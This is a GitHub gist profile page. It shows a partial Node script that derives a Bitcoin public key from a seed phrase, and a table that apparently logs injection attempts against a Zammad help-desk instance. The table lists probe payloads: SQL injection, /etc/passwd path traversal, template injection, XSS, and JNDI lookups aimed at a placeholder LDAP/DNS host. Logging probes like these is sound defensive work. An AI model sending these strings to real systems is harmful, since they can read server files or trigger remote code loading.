Skip to content

Instantly share code, notes, and snippets.

View learntheropes's full-sized avatar

Giovanni LPY learntheropes

View GitHub Profile
@learntheropes
learntheropes / derive-pubkey.cjs
Last active February 5, 2026 18:43
derive publickey from seed phrase - this script derives the pubkey stored in the db from the seed phrase backup without revealing any private or confidential info
// From the terminal in the save directory where this script is saved:
// npm i bip39 bip32 @bitcoinerlab/secp256k1
// MNEMONIC="your mnemonic here" node derive-pubkey.cjs
const bip39 = require('bip39')
const BIP32Factory = require('bip32').default
const ecc = require('@bitcoinerlab/secp256k1')
const bip32 = BIP32Factory(ecc)
gh api -H "Accept: application/vnd.github+json" "/orgs/p2pay/secret-scanning/alerts?per_page=100" --jq 'length'
d6569a58-66cf-4f44-8b07-7c02a5c6efab
@learntheropes
learntheropes / injections.md
Last active May 26, 2026 18:58
Zammad cloud injection attempts
ID Timestamp Payload Type
8278 2026-05-17T14:22:19Z ' OR 1=1-- SQL injection
8279 2026-05-17T14:22:21Z ../../etc/passwd Path traversal
8280 2026-05-17T14:22:23Z {{7*7}} Template injection (SSTI)
8281 2026-05-17T14:22:25Z <script> XSS
8282 2026-05-17T14:22:27Z ${jndi:ldap://x} JNDI lookup
8283 2026-05-17T14:22:29Z aaaa… (~230 chars) Buffer/overflow test
8311 2026-05-17T14:46:54Z ${jndi:ldap://audit-marker-research.invalid/a} JNDI (LDAP)
8312 2026-05-17T14:46:56Z ${jndi:dns://audit-marker-research.invalid} JNDI (DNS)